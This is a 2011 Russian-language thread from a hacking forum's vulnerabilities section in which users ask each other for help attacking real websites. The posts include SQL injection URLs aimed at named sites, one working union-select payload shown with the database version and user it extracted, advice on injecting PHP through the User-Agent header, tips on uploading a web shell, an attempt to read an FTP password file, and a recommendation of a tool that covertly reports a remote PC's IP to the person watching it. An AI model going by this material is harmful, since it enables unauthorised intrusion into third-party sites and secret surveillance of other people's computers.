HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.01.2011, 02:05
iget
Новичок
Регистрация: 29.03.2009
Сообщений: 8
С нами: 9010347

Репутация: 0
По умолчанию

Как залить шелл в xbtit?
 
Ответить с цитированием

  #2  
Старый 24.01.2011, 09:44
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами: 9382468

Репутация: 104
По умолчанию

Chest3r

Попробуй вставить php код в User-Agent,в логах он тоже записывается.
 
Ответить с цитированием

  #3  
Старый 24.01.2011, 10:38
Chest3r
Новичок
Регистрация: 14.11.2009
Сообщений: 2
С нами: 8679501

Репутация: 0
По умолчанию

Цитата:
Сообщение от Fooog  
Что можете подсказать для того что бы при каждой смене IP на удаленном компьютере. Мне на хостинг (а лучше е-мейл) приходил отчет о том под каким IP сейчас работает ПК.
Естественно надо что бы пользователь удаленной машины не знал об этом.
Как то мне тоже нужно было нечто подобное, я заюзал xStarter. Отличная штука. Но я настроил ее чтобы она посылала IP-адрес мне на аську, думаю и отправка на мыло должна быть. Все работало четко. Проверено.

Цитата:
Сообщение от TreV@N  
Chest3r
Попробуй вставить php код в User-Agent,в логах он тоже записывается.
Да если бы, я б с удовольствием воспользовался... Я же логи вижу полностью, и access и error, ничего подобного типа юзер-агента там нет. Только айпишник, дата и урл...
 
Ответить с цитированием

  #4  
Старый 24.01.2011, 13:50
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Подскажите что за база такая? Кто нибудь сталкивался с таким? Как его можно использовать?

Цитата:
Сообщение от None  
Database : ftpusers
Table : admin
Password:
pass
Цитата:
Сообщение от None  
Database : ftpusers
Table : users
Password:Uid:Comment:Status:
pass1:65534::1:
pass2:65534:Ftp user (for example):1:
фтп-шник Pure-FTPd FTP server

при подсоединении показывает приветствие

пробовал через Load File делать /etc/pureftpd.passwd не получилось
 
Ответить с цитированием

  #5  
Старый 24.01.2011, 13:58
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами: 9285182

Репутация: 340


По умолчанию

Цитата:
Сообщение от None  
Как то мне тоже нужно было нечто подобное, я заюзал xStarter. Отличная штука. Но я настроил ее чтобы она посылала IP-адрес мне на аську, думаю и отправка на мыло должна быть. Все работало четко. Проверено.
Цитата:
Сообщение от None  
Естественно надо что бы пользователь удаленной машины не знал об этом.
А там к сожалению палевный значок в трее.

Имхо, это как то скрыть можно. Но закачивать кучу софта на удаленный комп, не оптимальный вариант.
 
Ответить с цитированием

  #6  
Старый 24.01.2011, 19:43
X-Boson
Познающий
Регистрация: 25.02.2010
Сообщений: 46
С нами: 8531663

Репутация: 46
По умолчанию

Помогите пожалуйста раскрутить SQL иньекцию:

http://www.citi zens hip.ru/index.php?art=233

вроде как 8 полей.

Заранее благодарен.
 
Ответить с цитированием

  #7  
Старый 24.01.2011, 20:41
Skipp
Новичок
Регистрация: 12.05.2010
Сообщений: 2
С нами: 8421303

Репутация: 0
По умолчанию

Снова вопрос, так говорит что 4 поля

Цитата:
Сообщение от None  
http://ranak.by/news_comm.php?id=2606+group+by+4--+
А так-ошибка...

Цитата:
Сообщение от None  
http://ranak.by/news_comm.php?id=2606+and+1=0+union+select+1,2,3,4--+
Или то просто нет выводного поля?
 
Ответить с цитированием

  #8  
Старый 24.01.2011, 20:58
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Skipp  
Снова вопрос, так говорит что 4 поля
А так-ошибка...
Или то просто нет выводного поля?
http://ranak.by/news.php?id=-2608+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user()),4,5+--+

4.0.24_Debian-10sarge1-log:ranakby:ranakby@localhost

мдя уж.... голова для того что бы дождь в шею не лил?
 
Ответить с цитированием

  #9  
Старый 24.01.2011, 21:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от X-Boson  
Помогите пожалуйста раскрутить SQL иньекцию:
http://www.citi zens hip.ru/index.php?art=233
вроде как 8 полей.
Заранее благодарен.
крути как слепую

скажу одно, сайт на мастерхосте, админка если она есть(я не искал) скорее всего на бейсик авторизации, залить шелл через форум или блог если есть..и если зальешь шелл , увeряю прав там немного будет..
 
Ответить с цитированием

  #10  
Старый 25.01.2011, 03:49
ZnikiR
Участник форума
Регистрация: 14.01.2009
Сообщений: 194
С нами: 9116574

Репутация: 44
По умолчанию

Никак не могу понять как здесь код sql написть

Цитата:
Сообщение от None  
http://zhlondon.by/index.php?option=com_phocagallery&view=categories& Itemid=
http://www.reporter.tj/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=65
http://www.acfpl.org/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.